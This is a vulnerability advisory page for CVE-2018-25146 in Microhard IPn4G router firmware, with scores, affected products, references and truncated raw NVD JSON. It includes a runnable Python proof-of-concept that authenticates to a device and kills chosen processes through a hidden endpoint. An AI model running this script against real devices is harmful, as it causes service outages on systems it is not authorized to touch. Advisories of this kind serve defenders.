CVE-2018-25146

Description

Microhard Systems IPn4G 1.1.0 contains an undocumented vulnerability that allows authenticated attackers to list and manipulate running system processes. Attackers can send arbitrary signals to kill background processes and system services through a hidden feature, potentially causing service disruption and requiring device restart.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microhardcorp:ipn4g_firmware:1.1.0:build1098:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:microhardcorp:ipn4g:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microhardcorp:ipn3gb_firmware:2.2.0:build2160:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:microhardcorp:ipn3gb:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.6:build1184-14:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.0:rev2_build1090-2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.0:rev2_build1086:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:* - NOT VULNERABLE

Microhard Systems IPn4G 1.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2018-25146 PoC - Microhard IPn4G Process Manipulation
# Target: Microhard Systems IPn4G 1.1.0

def exploit(target_ip, username, password, target_pid=None):
    """
    Exploit for CVE-2018-25146 - Undocumented process manipulation vulnerability
    Allows authenticated users to list and manipulate running processes
    """
    base_url = f"http://{target_ip}"
    
    # Step 1: Authentication
    login_data = {
        'username': username,
        'password': password
    }
    
    session = requests.Session()
    login_response = session.post(f"{base_url}/login", data=login_data)
    
    if login_response.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Successfully authenticated")
    
    # Step 2: List running processes via hidden interface
    list_processes = session.get(f"{base_url}/cgi-bin/process_manager?action=list")
    
    if list_processes.status_code == 200:
        print("[+] Process list retrieved successfully")
        print(list_processes.text)
    else:
        print("[-] Failed to list processes")
        return False
    
    # Step 3: Kill target process (if PID provided)
    if target_pid:
        kill_data = {
            'action': 'kill',
            'pid': target_pid,
            'signal': '9'  # SIGKILL
        }
        kill_response = session.post(f"{base_url}/cgi-bin/process_manager", data=kill_data)
        
        if kill_response.status_code == 200:
            print(f"[+] Process {target_pid} terminated successfully")
            print("[!] Service disruption may occur - device restart may be required")
            return True
        else:
            print(f"[-] Failed to kill process {target_pid}")
            return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> [target_pid]")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    pid = sys.argv[4] if len(sys.argv) > 4 else None
    
    exploit(target, user, pwd, pid)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25146
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25146
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25146/
[4] VulDB https://vuldb.com/cve/CVE-2018-25146
[5] http://www.microhardcorp.com
[6] https://www.exploit-db.com/exploits/45035
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25146", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:49.057", "lastModified": "2026-02-02T16:16:13.940", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microhard Systems IPn4G 1.1.0 contains an undocumented vulnerability that allows authenticated attackers to list and manipulate running system processes. Attackers can send arbitrary signals to kill background processes and system services through a hidden feature, potentially causing service disruption and requiring device restart."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn4g_firmware:1.1.0:build1098:*:*:*:*:*:*", "matchCriteriaId": "D3EFDC3E-8C6F-4418-9045-79D20D9E4EA1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn4g:-:*:*:*:*:*:*:*", "matchCriteriaId": "00615A52-B793-4A62-83B0-960F5FE2C7A4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn3gb_firmware:2.2.0:build2160:*:*:*:*:*:*", "matchCriteriaId": "BF5C7674-E51C-4E63-B71F-FE42E4418778"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn3gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "52DB6EA5-3543-4883-B632-F23932C09587"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.6:build1184-14:*:*:*:*:*:*", "matchCriteriaId": "101F7459-230B-4773-9338-908F9F90D469"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "65C85AE1-505D-47A3-92BF-7D3276EF042D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.0:rev2_build1090-2:*:*:*:*:*:*", "matchCriteriaId": "7C7B4335-4C17-4571-A427-C215D9E8B02E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "65C85AE1-505D-47A3-92BF-7D3276 ... (truncated)